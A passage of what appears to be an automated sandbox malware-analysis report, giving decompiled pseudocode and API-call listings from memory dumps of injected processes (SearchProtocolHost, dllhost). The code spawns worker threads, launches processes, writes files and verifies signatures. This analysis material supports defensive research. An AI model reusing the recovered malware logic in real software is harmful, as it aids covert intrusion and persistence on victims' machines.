                                                													__eflags = _t44 - _t36;
                                                													__eflags = _t30 & 0xffffff00 | _t44 != _t36;
                                                													goto L23;
                                                												}
                                                											}
                                                											__eflags =  *((char*)(_t47 + 0xd));
                                                											_t27 = _v0;
                                                										} while ( *((char*)(_t47 + 0xd)) == 0);
                                                									}
                                                									return _t41;
                                                								} else {
                                                									_t3 = _t38 + 0x23; // 0x23
                                                									_t34 = _t3 & 0xffffffe0;
                                                									__eflags = _t34;
                                                									 *(_t34 - 4) = _t38;
                                                									return _t34;
                                                								}
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					L1:
                                                					return _t21;
                                                				}
                                                			}























                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d4d94b3da0a5e812334f92b6ea78398cba0483e66d9f29c4962a5b30bfa7424f
                                                • Instruction ID: edd15ccaa86712ff2fde148e87afd86d4ed5b115df3beac087aae75f8dbfd156
                                                • Opcode Fuzzy Hash: d4d94b3da0a5e812334f92b6ea78398cba0483e66d9f29c4962a5b30bfa7424f
                                                • Instruction Fuzzy Hash: 23F02EF3D0020146AE15FBB18E6169F325E4E107E4748463AEF1AC7148EB15E5908956
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 64%
                                                			E02FA4E00(CHAR* __ecx, void* __edx, long _a4) {
                                                				long _v8;
                                                				int _t7;
                                                				void* _t14;
                                                				void* _t18;
                                                
                                                				_push(__ecx);
                                                				_t14 = __edx;
                                                				_v8 = 0;
                                                				_t18 = CreateFileA(__ecx, 0x40000000, 2, 0, 2, 0x80, 0);
                                                				if(_t18 == 0) {
                                                					L3:
                                                					return 0;
                                                				} else {
                                                					_t7 = WriteFile(_t18, _t14, _a4,  &_v8, 0);
                                                					_push(_t18);
                                                					if(_t7 != 0) {
                                                						CloseHandle();
                                                						return 1;
                                                					} else {
                                                						CloseHandle();
                                                						goto L3;
                                                					}
                                                				}
                                                			}








                                                APIs
                                                • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,73BCF7E0,00000000,?,?,02FA9845), ref: 02FA4E22
                                                • WriteFile.KERNEL32(00000000,00000000,02FA9845,00000000,00000000,?,02FA9845), ref: 02FA4E39
                                                • CloseHandle.KERNEL32(00000000,?,02FA9845), ref: 02FA4E44
                                                • CloseHandle.KERNEL32(00000000,?,02FA9845), ref: 02FA4E52
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: CloseFileHandle$CreateWrite
                                                • String ID:
                                                • API String ID: 3602564925-0
                                                • Opcode ID: f7233b321c7ae710b54c68e501be1671679386b67ef926ee481a1dd3a46f19ee
                                                • Instruction ID: 44b9d52d1eb713cdae8a2c9785fa35c169646372914e94f9f4024245d5adb5bf
                                                • Opcode Fuzzy Hash: f7233b321c7ae710b54c68e501be1671679386b67ef926ee481a1dd3a46f19ee
                                                • Instruction Fuzzy Hash: 67F0E972A91218B7EB204B45AD0FFDBBB5CDB45BA1F504195FE08F728097E1681146F1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 97%
                                                			E02FA9B40(void* __ecx, intOrPtr __edx) {
                                                				signed int _v8;
                                                				intOrPtr _v12;
                                                				intOrPtr _v16;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t47;
                                                				intOrPtr _t48;
                                                				char _t50;
                                                				intOrPtr _t54;
                                                				void* _t55;
                                                				intOrPtr _t57;
                                                				char _t59;
                                                				intOrPtr _t63;
                                                				void* _t64;
                                                				void* _t66;
                                                				intOrPtr _t67;
                                                				intOrPtr* _t69;
                                                				void* _t73;
                                                				intOrPtr* _t76;
                                                				void* _t80;
                                                				void* _t84;
                                                				void* _t85;
                                                				intOrPtr* _t86;
                                                				intOrPtr* _t87;
                                                				signed int _t88;
                                                				intOrPtr _t89;
                                                				signed int _t90;
                                                				intOrPtr _t91;
                                                				void* _t92;
                                                
                                                				_t47 = 0;
                                                				_v12 = __edx;
                                                				_t66 = __ecx;
                                                				_v8 = 0;
                                                				asm("o16 nop [eax+eax]");
                                                				while(1) {
                                                					_t3 = _t47 + 0x2fd4e80; // 0x2fd4e80
                                                					_t86 = _t3;
                                                					if(_t86 == 0) {
                                                						break;
                                                					} else {
                                                						_t76 = _t86;
                                                						_t4 = _t76 + 1; // 0x2fd4e81
                                                						_t85 = _t4;
                                                						goto L3;
                                                					}
                                                					do {
                                                						L3:
                                                						_t57 =  *_t76;
                                                						_t76 = _t76 + 1;
                                                					} while (_t57 != 0);
                                                					if(_t76 == _t85) {
                                                						break;
                                                					}
                                                					_t90 = 0;
                                                					if( *(_t66 + 0x20) <= 0) {
                                                						L10:
                                                						_t91 = E02FB0A6E(_t90, _t99, 0x100);
                                                						_t92 = _t92 + 4;
                                                						_v16 = _t91;
                                                						_t80 = _t91 - _v8 - 0x2fd4e80;
                                                						do {
                                                							_t59 =  *_t86;
                                                							_t86 = _t86 + 1;
                                                							 *((char*)(_t80 + _t86 - 1)) = _t59;
                                                						} while (_t59 != 0);
                                                						if(E02FA6F70(_t66) != 0) {
                                                							_t16 = _t66 + 0x20; // 0x4d005c
                                                							_t17 = _t66 + 0x1c; // 0x610074
                                                							 *((intOrPtr*)( *_t17 +  *_t16 * 4)) = _t91;
                                                							 *(_t66 + 0x20) =  *(_t66 + 0x20) + 1;
                                                						}
                                                						L14:
                                                						_t47 = _v8 - 0xffffff80;
                                                						_v8 = _t47;
                                                						if(_t47 < 0x600) {
                                                							continue;
                                                						}
                                                						break;
                                                					} else {
                                                						goto L6;
                                                					}
                                                					while(1) {
                                                						L6:
                                                						_t63 = 0;
                                                						_t6 = _t66 + 0x20; // 0x4d005c
                                                						if(_t90 <  *_t6) {
                                                							_t7 = _t66 + 0x1c; // 0x610074
                                                							_t63 =  *((intOrPtr*)( *_t7 + _t90 * 4));
                                                						}
                                                						_t64 = E02FB7612(_t86, _t90, _t63, _t86);
                                                						_t92 = _t92 + 8;
                                                						if(_t64 == 0) {
                                                							goto L14;
                                                						}
                                                						_t90 = _t90 + 1;
                                                						_t10 = _t66 + 0x20; // 0x4d005c
                                                						_t99 = _t90 -  *_t10;
                                                						if(_t90 <  *_t10) {
                                                							continue;
                                                						}
                                                						goto L10;
                                                					}
                                                					goto L14;
                                                				}
                                                				_t67 = _v12;
                                                				_t48 = 0;
                                                				_v8 = 0;
                                                				asm("o16 nop [eax+eax]");
                                                				while(1) {
                                                					_t26 = _t48 + "123"; // 0x2fd0e80
                                                					_t87 = _t26;
                                                					if(_t87 == 0) {
                                                						break;
                                                					}
                                                					_t69 = _t87;
                                                					_t27 = _t69 + 1; // 0x2fd0e81
                                                					_t84 = _t27;
                                                					do {
                                                						_t48 =  *_t69;
                                                						_t69 = _t69 + 1;
                                                					} while (_t48 != 0);
                                                					if(_t69 == _t84) {
                                                						break;
                                                					}
                                                					_t88 = 0;
                                                					if( *(_t67 + 0x20) <= 0) {
                                                						L25:
                                                						_t89 = E02FB0A6E(_t88, _t111, 0x100);
                                                						_t92 = _t92 + 4;
                                                						_v16 = _t89;
                                                						_t73 = _t89 - _v8 - "123";
                                                						do {
                                                							_t50 =  *_t87;
                                                							_t36 = _t87 + 1; // 0x3332
                                                							_t87 = _t36;
                                                							 *((char*)(_t73 + _t87 - 1)) = _t50;
                                                						} while (_t50 != 0);
                                                						if(E02FA6F70(_t67) != 0) {
                                                							 *((intOrPtr*)( *((intOrPtr*)(_t67 + 0x1c)) +  *(_t67 + 0x20) * 4)) = _t89;
                                                							 *(_t67 + 0x20) =  *(_t67 + 0x20) + 1;
                                                						}
                                                						L29:
                                                						_t48 = _v8 - 0xffffff80;
                                                						_v8 = _t48;
                                                						if(_t48 < 0x4000) {
                                                							continue;
                                                						}
                                                						break;
                                                					} else {
                                                						goto L21;
                                                					}
                                                					while(1) {
                                                						L21:
                                                						_t54 = 0;
                                                						if(_t88 <  *(_t67 + 0x20)) {
                                                							_t54 =  *((intOrPtr*)( *((intOrPtr*)(_t67 + 0x1c)) + _t88 * 4));
                                                						}
                                                						_t55 = E02FB7612(_t87, _t88, _t54, _t87);
                                                						_t92 = _t92 + 8;
                                                						if(_t55 == 0) {
                                                							goto L29;
                                                						}
                                                						_t88 = _t88 + 1;
                                                						_t111 = _t88 -  *(_t67 + 0x20);
                                                						if(_t88 <  *(_t67 + 0x20)) {
                                                							continue;
                                                						}
                                                						goto L25;
                                                					}
                                                					goto L29;
                                                				}
                                                				return _t48;
                                                			}

































                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 123
                                                • API String ID: 0-2286445522
                                                • Opcode ID: 550158e53739d0481e29af591454440079922dc32effe9eb5b489071e4250294
                                                • Instruction ID: e1f10b214f6fb472edfcb227621cb8037103cf73bfa6e8c1e51b716a625996ab
                                                • Opcode Fuzzy Hash: 550158e53739d0481e29af591454440079922dc32effe9eb5b489071e4250294
                                                • Instruction Fuzzy Hash: 6941F8F5900111DFCF14DF789494AA9B7B2BF49384B1646A8CD89AB346D771EA02CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E02FAA330(WCHAR* __ecx) {
                                                				struct _PROCESS_INFORMATION _v24;
                                                				struct _STARTUPINFOW _v96;
                                                				void* _t19;
                                                				WCHAR* _t20;
                                                
                                                				_t20 = __ecx;
                                                				E02FB3440(_t19,  &_v96, 0, 0x44);
                                                				_v96.cb = 0x44;
                                                				_v96.dwFlags = 1;
                                                				_v96.wShowWindow = 5;
                                                				asm("xorps xmm0, xmm0");
                                                				asm("movups [ebp-0x14], xmm0");
                                                				if(CreateProcessW(0, _t20, 0, 0, 0, 0x8000000, 0, 0,  &_v96,  &_v24) == 0) {
                                                					return 0;
                                                				} else {
                                                					WaitForSingleObject(_v24, 0);
                                                					return 1;
                                                				}
                                                			}








                                                APIs
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?,?,745EC0B0), ref: 02FAA384
                                                • WaitForSingleObject.KERNEL32(?,00000000,?,745EC0B0), ref: 02FAA393
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: CreateObjectProcessSingleWait
                                                • String ID: D
                                                • API String ID: 623904672-2746444292
                                                • Opcode ID: ad7e477876565965216196837f54315a7a5a20a33bb956514be8b616dd7c44e5
                                                • Instruction ID: e45cc1cb7e7a0f24c8c89bdaa3167622e6dd00eca6db0356bac3653f3c98866c
                                                • Opcode Fuzzy Hash: ad7e477876565965216196837f54315a7a5a20a33bb956514be8b616dd7c44e5
                                                • Instruction Fuzzy Hash: 2D01DB71EC020C6AEB109A95DC46FDFF768EB04B54F204116FB14BB1C0E6B264148BA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 83%
                                                			E02FAB1F0(intOrPtr* __ecx, void* __esi) {
                                                				signed int _v8;
                                                				char _v268;
                                                				char _v528;
                                                				signed int _t12;
                                                				char _t14;
                                                				long _t20;
                                                				intOrPtr* _t25;
                                                				void* _t32;
                                                				signed int _t34;
                                                
                                                				_t25 = __ecx;
                                                				_t12 =  *0x2fcf008; // 0x93ad1eea
                                                				_v8 = _t12 ^ _t34;
                                                				_t32 =  &_v268 - __ecx;
                                                				do {
                                                					_t14 =  *_t25;
                                                					_t25 = _t25 + 1;
                                                					 *((char*)(_t32 + _t25 - 1)) = _t14;
                                                				} while (_t14 != 0);
                                                				E02FAA2B0( &_v268);
                                                				E02FA3F90( &_v268,  &_v528, "\\\\%s",  &_v268);
                                                				_t20 = WNetCancelConnection2A( &_v528, 0, 1);
                                                				if(_t20 != 0) {
                                                					SetLastError(_t20);
                                                					return E02FB0A5D(_v8 ^ _t34, __esi);
                                                				} else {
                                                					return E02FB0A5D(_v8 ^ _t34, __esi);
                                                				}
                                                			}













                                                APIs
                                                • WNetCancelConnection2A.MPR(?,00000000,00000001), ref: 02FAB24E
                                                • SetLastError.KERNEL32(00000000), ref: 02FAB26C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: CancelConnection2ErrorLast
                                                • String ID: \\%s
                                                • API String ID: 822135197-3838199987
                                                • Opcode ID: e35fbff9f6bb7cf30478476b9bf36b11a0c1b57dde5bd18b319b0a9752cfadc6
                                                • Instruction ID: 8b9712c1e80f2fe1ed580c7ee5a3e4763ebdd971473ae715acb68a9a2dd208a7
                                                • Opcode Fuzzy Hash: e35fbff9f6bb7cf30478476b9bf36b11a0c1b57dde5bd18b319b0a9752cfadc6
                                                • Instruction Fuzzy Hash: 7F01F570E4420C9BCB20DFB0DC14BE9B7B9EF15344F1045D9D90ADB142EE32AA488B40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 100%
                                                			E028693E0(void* __eflags) {
                                                				void* _t3;
                                                				long _t15;
                                                
                                                				FreeConsole();
                                                				SetUnhandledExceptionFilter(E02869300); // executed
                                                				_t3 = E02869310(); // executed
                                                				if(_t3 != 0) {
                                                					Sleep(0xbb8); // executed
                                                					CreateThread(0, 0, E0286AFC0, 0, 0, 0); // executed
                                                					CreateThread(0, 0, E02866D40, 0, 0, 0); // executed
                                                					CreateThread(0, 0, E0286B470, 0, 0, 0); // executed
                                                					CreateThread(0, 0, E02867C20, 0, 0, 0); // executed
                                                					CreateThread(0, 0, E02865200, 0, 0, 0); // executed
                                                					_t15 = GetTickCount();
                                                					if(GetTickCount() - _t15 >= 0xa4cb80) {
                                                						L4:
                                                						ExitProcess(0);
                                                					} else {
                                                						goto L3;
                                                					}
                                                					do {
                                                						L3:
                                                						Sleep(0xea60); // executed
                                                					} while (GetTickCount() - _t15 < 0xa4cb80);
                                                					goto L4;
                                                				}
                                                				return 0;
                                                			}






                                                APIs
                                                • FreeConsole.KERNEL32 ref: 028693E3
                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00009300), ref: 028693EE
                                                  • Part of subcall function 02869310: WSAStartup.WS2_32(00000202,?), ref: 02869335
                                                  • Part of subcall function 02869310: CreateMutexA.KERNELBASE ref: 0286937F
                                                  • Part of subcall function 02869310: GetLastError.KERNEL32 ref: 02869387
                                                  • Part of subcall function 02869310: ReleaseMutex.KERNEL32(00000000), ref: 0286939E
                                                  • Part of subcall function 02869310: CloseHandle.KERNEL32(00000000), ref: 028693A5
                                                • Sleep.KERNELBASE(00000BB8), ref: 0286940E
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_0000AFC0,00000000,00000000,00000000), ref: 02869425
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00006D40,00000000,00000000,00000000), ref: 02869436
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_0000B470,00000000,00000000,00000000), ref: 02869447
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00007C20,00000000,00000000,00000000), ref: 02869458
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005200,00000000,00000000,00000000), ref: 02869469
                                                • GetTickCount.KERNEL32 ref: 02869471
                                                • GetTickCount.KERNEL32 ref: 02869475
                                                • Sleep.KERNELBASE(0000EA60), ref: 02869485
                                                • GetTickCount.KERNEL32 ref: 02869487
                                                • ExitProcess.KERNEL32 ref: 02869494
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: Create$Thread$CountTick$MutexSleep$CloseConsoleErrorExceptionExitFilterFreeHandleLastProcessReleaseStartupUnhandled
                                                • String ID:
                                                • API String ID: 4116069078-0
                                                • Opcode ID: 4fe48fdc6b43e8ae49e55e1605aa4bf18c7e0cd131ea6e0fe70b617791d5824c
                                                • Instruction ID: 86a173acb3b58f330bf09eb505bc75a77cb559819f6f072cee56792834adde45
                                                • Opcode Fuzzy Hash: 4fe48fdc6b43e8ae49e55e1605aa4bf18c7e0cd131ea6e0fe70b617791d5824c
                                                • Instruction Fuzzy Hash: 4D11083DBD432876F57026B95C4FF292E449B40F65F754812F309FE1C089D8744189AE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 28%
                                                			E02864920(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                				char _v8;
                                                				long* _v12;
                                                				long* _v16;
                                                				int _t16;
                                                				char* _t20;
                                                				intOrPtr _t21;
                                                				void* _t24;
                                                				void* _t27;
                                                				long* _t30;
                                                
                                                				_t16 = CryptAcquireContextA( &_v12, 0, 0, 1, 0xf0000000); // executed
                                                				if(_t16 != 0) {
                                                					if(CryptImportKey(_v12, 0x2890ce0, 0x94, 0, 0,  &_v16) == 0) {
                                                						goto L1;
                                                					} else {
                                                						_t20 =  &_v8;
                                                						__imp__CryptCreateHash(_v12, 0x8003, 0, 0, _t20);
                                                						if(_t20 == 0) {
                                                							goto L1;
                                                						} else {
                                                							__imp__CryptHashData(_v8, _a4, _a8, 0);
                                                							if(_t20 == 0) {
                                                								goto L1;
                                                							} else {
                                                								__imp__CryptVerifySignatureA(_v8, _a12, _a16, _v16, 0, 0, _t24);
                                                								_t21 = _v8;
                                                								_t27 =  !=  ? 1 : 0;
                                                								if(_t21 != 0) {
                                                									__imp__CryptDestroyHash(_t21);
                                                								}
                                                								_t30 = _v12;
                                                								if(_t30 != 0) {
                                                									CryptReleaseContext(_t30, 0);
                                                								}
                                                								return _t27;
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					L1:
                                                					return 0;
                                                				}
                                                			}













                                                APIs
                                                • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000050,?,?), ref: 02864935
                                                • CryptImportKey.ADVAPI32(00000000,02890CE0,00000094,00000000,00000000,?), ref: 0286495A
                                                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 02864974
                                                • CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 02864989
                                                • CryptVerifySignatureA.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?), ref: 028649A6
                                                • CryptDestroyHash.ADVAPI32(?), ref: 028649C1
                                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 028649D1
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyImportReleaseSignatureVerify
                                                • String ID:
                                                • API String ID: 949692108-0
                                                • Opcode ID: 36c361e7b2ada869a74f4cb37778e26fbfdeb413ce90ba1c0ebba911e09de2fc
                                                • Instruction ID: b30f186ef09dded09c147370a04b5c9cb4e8120ad25bb28df0430c69ded0dc79
                                                • Opcode Fuzzy Hash: 36c361e7b2ada869a74f4cb37778e26fbfdeb413ce90ba1c0ebba911e09de2fc
                                                • Instruction Fuzzy Hash: 75214C3DBC0308BBEF218EA4DC0AFAD7BA9BB04B05F500054FA04E61D0D7759A209A54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 84%
                                                			E0286F4E0(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, signed int _a4, void* _a8) {
                                                				signed int _v8;
                                                				char _v276;
                                                				char _v540;
                                                				unsigned int _v568;
                                                				signed int _v592;
                                                				signed int _v596;
                                                				unsigned int _v604;
                                                				unsigned int _v620;
                                                				struct _FILETIME _v628;
                                                				struct _FILETIME _v636;
                                                				intOrPtr* _v640;
                                                				signed int _v644;
                                                				signed int _v648;
                                                				signed int _v652;
                                                				signed int _v656;
                                                				char _v658;
                                                				char _v659;
                                                				signed int _v660;
                                                				signed int _v664;
                                                				void* __esi;
                                                				signed int _t195;
                                                				signed int _t199;
                                                				signed int _t204;
                                                				signed int _t205;
                                                				signed int _t208;
                                                				void* _t209;
                                                				signed int _t212;
                                                				signed int _t213;
                                                				signed int _t214;
                                                				signed int _t215;
                                                				signed int _t216;
                                                				signed int _t217;
                                                				signed int _t218;
                                                				signed int _t223;
                                                				signed int _t235;
                                                				signed int _t244;
                                                				signed int _t250;
                                                				signed int _t253;
                                                				signed int _t254;
                                                				signed char _t255;
                                                				signed int _t262;
                                                				signed int _t264;
                                                				signed int _t270;
                                                				signed int _t271;
                                                				signed int _t273;
                                                				signed int _t279;
                                                				signed int _t280;
                                                				signed int _t282;
                                                				signed int _t289;
                                                				signed int _t294;
                                                				signed int _t296;
                                                				void* _t307;
                                                				signed int _t312;
                                                				signed int _t319;
                                                				signed int _t328;
                                                				signed int _t330;
                                                				signed char _t334;
                                                				long _t338;
                                                				signed int _t339;
                                                				intOrPtr* _t345;
                                                				signed int _t348;
                                                				signed int _t356;
                                                				signed int _t361;
                                                				unsigned int _t380;
                                                				unsigned int _t382;
                                                				void* _t383;
                                                				signed int _t384;
                                                				signed int _t385;
                                                				signed int _t390;
                                                				intOrPtr _t392;
                                                				signed int* _t395;
                                                				signed int _t409;
                                                				void* _t410;
                                                				void* _t411;
                                                				intOrPtr* _t413;
                                                				void* _t414;
                                                				void* _t416;
                                                				void* _t417;
                                                				void* _t418;
                                                				void* _t419;
                                                				void* _t421;
                                                				signed int _t422;
                                                				signed int _t424;
                                                				signed int _t427;
                                                				signed int _t428;
                                                				void* _t430;
                                                
                                                				_t424 = (_t422 & 0xfffffff8) - 0x294;
                                                				_t195 =  *0x288f008; // 0xe7fe870c
                                                				_v8 = _t195 ^ _t424;
                                                				_t307 = _a8;
                                                				_t409 = _a4;
                                                				_v652 = _t307;
                                                				_t395 = __ecx;
                                                				_v640 = __ecx;
                                                				if(_t409 < 0xffffffff) {
                                                					L81:
                                                					_pop(_t410);
                                                					__eflags = _v8 ^ _t424;
                                                					return E02870A5D(_v8 ^ _t424, _t410);
                                                				} else {
                                                					_t318 =  *__ecx;
                                                					if(_t409 >=  *((intOrPtr*)( *__ecx + 4))) {
                                                						goto L81;
                                                					} else {
                                                						if( *((intOrPtr*)(__ecx + 4)) != 0xffffffff) {
                                                							E0286F2D0(_t318, __edx);
                                                						}
                                                						_t395[1] = 0xffffffff;
                                                						if(_t409 != _t395[0x4d]) {
                                                							__eflags = _t409 - 0xffffffff;
                                                							if(_t409 != 0xffffffff) {
                                                								_t319 =  *_t395;
                                                								__eflags = _t409 -  *((intOrPtr*)(_t319 + 0x10));
                                                								if(_t409 <  *((intOrPtr*)(_t319 + 0x10))) {
                                                									E0286EC60(_t319);
                                                								}
                                                								_t199 =  *_t395;
                                                								__eflags =  *((intOrPtr*)(_t199 + 0x10)) - _t409;
                                                								if( *((intOrPtr*)(_t199 + 0x10)) < _t409) {
                                                									_t312 = _t409;
                                                									do {
                                                										_t409 =  *_t395;
                                                										__eflags = _t409;
                                                										if(_t409 != 0) {
                                                											__eflags =  *(_t409 + 0x18);
                                                											if( *(_t409 + 0x18) != 0) {
                                                												_t392 =  *((intOrPtr*)(_t409 + 0x10)) + 1;
                                                												__eflags = _t392 -  *((intOrPtr*)(_t409 + 4));
                                                												if(_t392 !=  *((intOrPtr*)(_t409 + 4))) {
                                                													 *((intOrPtr*)(_t409 + 0x10)) = _t392;
                                                													 *((intOrPtr*)(_t409 + 0x14)) =  *((intOrPtr*)(_t409 + 0x14)) +  *((intOrPtr*)(_t409 + 0x48)) + 0x2e +  *((intOrPtr*)(_t409 + 0x50)) +  *((intOrPtr*)(_t409 + 0x4c));
                                                													_t294 = E0286E7C0(_t409, _t409 + 0x28, _t409 + 0x78, 0, 0); // executed
                                                													_t424 = _t424 - 0x10 + 0x1c;
                                                													asm("sbb eax, eax");
                                                													_t296 =  ~_t294 + 1;
                                                													__eflags = _t296;
                                                													 *(_t409 + 0x18) = _t296;
                                                												}
                                                											}
                                                										}
                                                										_t289 =  *_t395;
                                                										__eflags =  *((intOrPtr*)(_t289 + 0x10)) - _t312;
                                                									} while ( *((intOrPtr*)(_t289 + 0x10)) < _t312);
                                                									_t307 = _v652;
                                                								}
                                                								E0286E7C0( *_t395,  &_v620, 0,  &_v540, 0x104); // executed
                                                								_t204 = E0286ECA0( *_t395,  &_v648, __eflags,  &_v652,  &_v664); // executed
                                                								_t427 = _t424 - 0x10 + 0x24;
                                                								__eflags = _t204;
                                                								if(_t204 == 0) {
                                                									_t205 = E0286E170( *( *_t395), _v652, 0); // executed
                                                									_t428 = _t427 + 4;
                                                									__eflags = _t205;
                                                									if(__eflags != 0) {
                                                										L24:
                                                										_pop(_t411);
                                                										__eflags = _v8 ^ _t428;
                                                										return E02870A5D(_v8 ^ _t428, _t411);
                                                									} else {
                                                										_push(_v664);
                                                										_t208 = E02870AB4(_t409, __eflags);
                                                										_t412 = _t208;
                                                										_v656 = _t208;
                                                										_t209 = E0286E200(_t208, 1, _v664,  *( *_t395));
                                                										_t430 = _t428 + 0xc;
                                                										__eflags = _t209 - _v664;
                                                										if(_t209 == _v664) {
                                                											_t328 = 0;
                                                											__eflags = 0;
                                                											 *_t307 =  *( *_t395 + 0x10);
                                                											do {
                                                												_t212 =  *((intOrPtr*)(_t430 + _t328 + 0x88));
                                                												_t328 = _t328 + 1;
                                                												 *((char*)(_t430 + _t328 + 0x18f)) = _t212;
                                                												__eflags = _t212;
                                                											} while (_t212 != 0);
                                                											_t413 =  &_v276;
                                                											while(1) {
                                                												_t213 =  *_t413;
                                                												__eflags = _t213;
                                                												if(_t213 == 0) {
                                                													goto L31;
                                                												}
                                                												L29:
                                                												__eflags =  *((char*)(_t413 + 1)) - 0x3a;
                                                												if( *((char*)(_t413 + 1)) == 0x3a) {
                                                													_t413 = _t413 + 2;
                                                													while(1) {
                                                														_t213 =  *_t413;
                                                														__eflags = _t213;
                                                														if(_t213 == 0) {
                                                															goto L31;
                                                														}
                                                														goto L29;
                                                													}
                                                												}
                                                												L31:
                                                												__eflags = _t213 - 0x5c;
                                                												if(_t213 == 0x5c) {
                                                													_t413 = _t413 + 1;
                                                													while(1) {
                                                														_t213 =  *_t413;
                                                														__eflags = _t213;
                                                														if(_t213 == 0) {
                                                															goto L31;
                                                														}
                                                														goto L29;
                                                													}
                                                												}
                                                												__eflags = _t213 - 0x2f;
                                                												if(_t213 == 0x2f) {
                                                													_t413 = _t413 + 1;
                                                													while(1) {
                                                														_t213 =  *_t413;
                                                														__eflags = _t213;
                                                														if(_t213 == 0) {
                                                															goto L31;
                                                														}
                                                														goto L29;
                                                													}
                                                												}
                                                												_t214 = E02875FFF(_t413, "\\..\\");
                                                												_t430 = _t430 + 8;
                                                												__eflags = _t214;
                                                												if(_t214 != 0) {
                                                													_t61 = _t214 + 4; // 0x4
                                                													_t413 = _t61;
                                                													while(1) {
                                                														_t213 =  *_t413;
                                                														__eflags = _t213;
                                                														if(_t213 == 0) {
                                                															goto L31;
                                                														}
                                                														goto L29;
                                                													}
                                                												}
                                                												_t215 = E02875FFF(_t413, "\\../");
                                                												_t430 = _t430 + 8;
                                                												__eflags = _t215;
                                                												if(_t215 != 0) {
                                                													_t62 = _t215 + 4; // 0x4
                                                													_t413 = _t62;
                                                													while(1) {
                                                														_t213 =  *_t413;
                                                														__eflags = _t213;
                                                														if(_t213 == 0) {
                                                															goto L31;
                                                														}
                                                														goto L29;
                                                													}
                                                												}
                                                												_t216 = E02875FFF(_t413, "/../");
                                                												_t430 = _t430 + 8;
                                                												__eflags = _t216;
                                                												if(_t216 != 0) {
                                                													_t63 = _t216 + 4; // 0x4
                                                													_t413 = _t63;
                                                													while(1) {
                                                														_t213 =  *_t413;
                                                														__eflags = _t213;
                                                														if(_t213 == 0) {
                                                															goto L31;
                                                														}
                                                														goto L29;
                                                													}
                                                													goto L31;
                                                												}
                                                												_t217 = E02875FFF(_t413, "/..\\");
                                                												_t430 = _t430 + 8;
                                                												__eflags = _t217;
                                                												if(_t217 != 0) {
                                                													_t64 = _t217 + 4; // 0x4
                                                													_t413 = _t64;
                                                													continue;
                                                												}
                                                												_t65 = _t307 + 4; // 0x2865092
                                                												_t330 = _t65 - _t413;
                                                												__eflags = _t330;
                                                												do {
                                                													_t218 =  *_t413;
                                                													_t413 = _t413 + 1;
                                                													 *((char*)(_t330 + _t413 - 1)) = _t218;
                                                													__eflags = _t218;
                                                												} while (_t218 != 0);
                                                												_t380 = _v568;
